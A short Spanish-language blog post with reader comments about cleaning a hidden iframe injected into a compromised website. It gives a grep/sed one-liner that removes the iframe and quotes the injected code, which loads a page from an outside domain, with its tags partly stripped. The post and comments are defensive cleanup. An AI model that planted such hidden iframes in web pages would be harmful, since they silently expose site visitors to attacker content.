Eliminar contenido XSS (cross site scripting)
Mini post:
Encontré en uno de los sitios web que mantengo, un código de XSS (cross site scripting). Aún no determiné el punto de entrada, pero me enteré gracias a un mail de Google.
Con grep y sed es bastante sencillo eliminarlo, ni que hablar con un script en Python 😛
Con grep busco los archivos, y con xargs convierto la salida el pipe en un parámetro para sed, y con sed reemplazo el código. Como el código insertado está al final del archivo, la expresión regular hubiese podido ser mucho más sencilla.
grep ./ -l -R -e "http://reycross.com/lib/index.php" | xargs sed -i -e "s/<iframe.*reycross.*>.*<\/iframe>/ /g" |
El código a eliminar era este (no agrego los tags de apertura a propósito):
iframe src="http://reycross.com/lib/index.php" width=0 height=0 style="hidden" framebord er=0 marginheight=0 marginwidth=0 scrolling=no iframe |
¿Alguien que le haya ocurrido esto?
Vio
si, al abrir mi blog pasan unos segundos y se redirecciona aqui
http://twitter. com/ w a t t a m a n
yo no estoy en twitter ni sé por que redireccionan mi pagina, creo que desde otros ordenadores se puede ver mi blog sin que pase esto, estoy mirando como quitarlo, pero cualquier sugerencia o idea seguro que vioene bien.
Creo que puede ser un xss la causa.
Saludos!
Milton Pividori
Anduvo perfecto. Gracias Nacho!
Rubén
Buenas, el sitio web de mi empresa ha sido atacado con XSS a una dirección de online stat… el hosting lo tengo subcontratado. ¿cómo puedo limpiar esa linea que se adjunta con iframe en el html index? ¿y para evitar que entre luego? El volver a subir el index.html no sirve, automáticamente vuelve a aparecer esa linea.
Saludos y gracias.